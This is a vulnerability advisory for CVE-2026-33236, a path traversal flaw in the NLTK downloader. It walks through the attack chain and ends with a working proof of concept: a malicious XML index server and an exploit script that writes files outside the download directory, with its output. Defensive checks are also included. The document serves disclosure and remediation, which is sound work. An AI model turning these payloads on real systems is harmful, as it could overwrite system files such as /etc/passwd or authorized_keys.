PT-2026-26300 · Pypi · Nltk
Published 2026-03-19 · Updated 2026-03-19 · CVE-2026-33236
CVSS v3.1: 8.1 High | AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Vulnerability Description
The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. An attacker who controls a remote XML index server can supply values containing path traversal sequences (such as ../), which can lead to:
- Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
- Arbitrary File Creation: Create arbitrary files
- Arbitrary File Overwrite: Overwrite critical system files (such as /etc/passwd, ~/.ssh/authorized_keys, etc.)
Vulnerability Principle
Key Code Locations
1. XML Parsing Without Validation (nltk/downloader.py:253)
   self.filename = os.path.join(subdir, id + ext)
   - subdir and id come directly from XML attributes without any validation
2. Path Construction Without Checks (nltk/downloader.py:679)
   filepath = os.path.join(download_dir, info.filename)
   - Directly uses filename, which may contain path traversal sequences
3. Unrestricted Directory Creation (nltk/downloader.py:687)
   os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
   - Can create arbitrary directories outside the download directory
4. File Writing Without Protection (nltk/downloader.py:695)
   with open(filepath, "wb") as outfile:
   - Can write to arbitrary locations in the file system
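The two join steps listed above can be illustrated with pure path arithmetic, without touching the file system. This is a minimal sketch, not NLTK's code: build_target is a hypothetical helper, the download directory /home/user/nltk_data is an assumed example, and posixpath is used so the result is the same on any platform.

```python
import posixpath


def build_target(download_dir, subdir, pkg_id, ext):
    """Mirror the two join steps from the advisory using POSIX path rules.

    Hypothetical helper for illustration only; not part of NLTK.
    """
    # Step 1 (package construction): filename = join(subdir, id + ext)
    filename = posixpath.join(subdir, pkg_id + ext)
    # Step 2 (download): filepath = join(download_dir, filename)
    filepath = posixpath.join(download_dir, filename)
    # normpath collapses "../" components lexically (symlinks are ignored).
    return posixpath.normpath(filepath)


# Assumed example values; neither path is read or written.
benign = build_target("/home/user/nltk_data", "corpora", "brown", ".zip")
hostile = build_target("/home/user/nltk_data", "../../../etc", "passwd", ".zip")

print(benign)   # stays below the download directory
print(hostile)  # resolves outside the download directory
```

Because os.path.join never rejects "../" components, the number of "../" segments needed depends only on how deep the download directory sits.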
Attack Chain
1. Attacker controls remote XML index server
↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
↓
3. Victim executes: downloader.download('passwd')
↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
↓
6. os.makedirs() creates directory: download_dir + "../../etc"
↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
↓
8. System file is overwritten!
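Step 2 of the chain relies on the index XML carrying hostile attribute values. One way to spot such entries before any download is attempted is to audit the index with the standard library's ElementTree. The sketch below is an assumption-laden illustration: suspicious_packages is a hypothetical helper, the sample index and the example.invalid URLs are invented, and the checks are not exhaustive (for example, Windows drive letters are not handled).

```python
import xml.etree.ElementTree as ET


def suspicious_packages(index_xml):
    """Return ids of <package> entries whose id or subdir looks like traversal.

    Hypothetical audit helper; not part of NLTK.
    """
    flagged = []
    root = ET.fromstring(index_xml)
    for pkg in root.iter("package"):
        pkg_id = pkg.get("id", "")
        subdir = pkg.get("subdir", "")
        # Normalise Windows separators so both styles are checked alike.
        parts = subdir.replace("\\", "/").split("/")
        bad_subdir = subdir.startswith(("/", "\\")) or ".." in parts
        # An id is expected to be a bare name, so any separator is suspect.
        bad_id = "/" in pkg_id or "\\" in pkg_id or pkg_id in ("", ".", "..")
        if bad_subdir or bad_id:
            flagged.append(pkg_id)
    return flagged


# Invented sample index: one benign entry, one shaped like the attack chain.
sample = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="brown" subdir="corpora" url="http://example.invalid/brown.zip"/>
    <package id="passwd" subdir="../../etc" url="http://example.invalid/passwd.zip"/>
  </packages>
</nltk_data>"""

print(suspicious_packages(sample))
```

A check like this only flags entries; it does not replace validating the final resolved path at write time.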
Impact Scope
- System File Overwrite
Reproduction Steps
Environment Setup
- Install NLTK
pip install nltk
- Prepare malicious server and exploit script (see PoC section)
Reproduction Process
Step 1: Start malicious server
python3 malicious_server.py
Step 2: Run exploit script
python3 exploit_vulnerability.py
Step 3: Verify results
ls -la /tmp/test_file.zip
Proof of Concept
Malicious Server (malicious_server.py)
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file" subdir="../../../../../../../../../tmp"
             url="http://127.0.0.1:8888/test.zip"
             size="100" unzipped_size="100" unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)
with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")


# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        # Silence per-request logging
        pass


# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")
Exploit Script (exploit_vulnerability.py)
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile


def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")

    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)

    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print("✗ Path traversal attack successful!")
    else:
        print("\n? File not found, download may have failed")


if __name__ == "__main__":
    exploit()
Execution Results
✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
Fix
Path traversal
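No patch is reproduced in this advisory. As a hedged illustration of the kind of check that blocks this class of bug, the sketch below resolves the final path and refuses anything that lands outside the download directory. It is not the upstream fix: safe_join is a hypothetical helper, and the directory and package names are assumed examples.

```python
import os
import tempfile


def safe_join(base_dir, *parts):
    """Join parts under base_dir; raise ValueError if the result escapes it.

    Hypothetical helper for illustration; not NLTK's actual fix.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, *parts))
    # commonpath equals base only when target is base itself or lies below it.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes download directory: {target!r}")
    return target


# Assumed example: a throwaway download directory.
download_dir = tempfile.mkdtemp(prefix="nltk_safe_")

# A normal package path is accepted.
inside = safe_join(download_dir, "corpora", "brown.zip")

# A traversal-style subdir, shaped like the PoC, is rejected.
try:
    safe_join(download_dir, "../../tmp", "test_file.zip")
    escaped = True
except ValueError:
    escaped = False

print(inside)
print("traversal accepted:", escaped)
```

Resolving with realpath before comparing means symlinks inside the download directory are followed first, so a link pointing elsewhere is also caught. Applying the same check to both the directory passed to os.makedirs() and the file path passed to open() would cover steps 3 and 4 of the key code locations.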
Affected Products
Nltk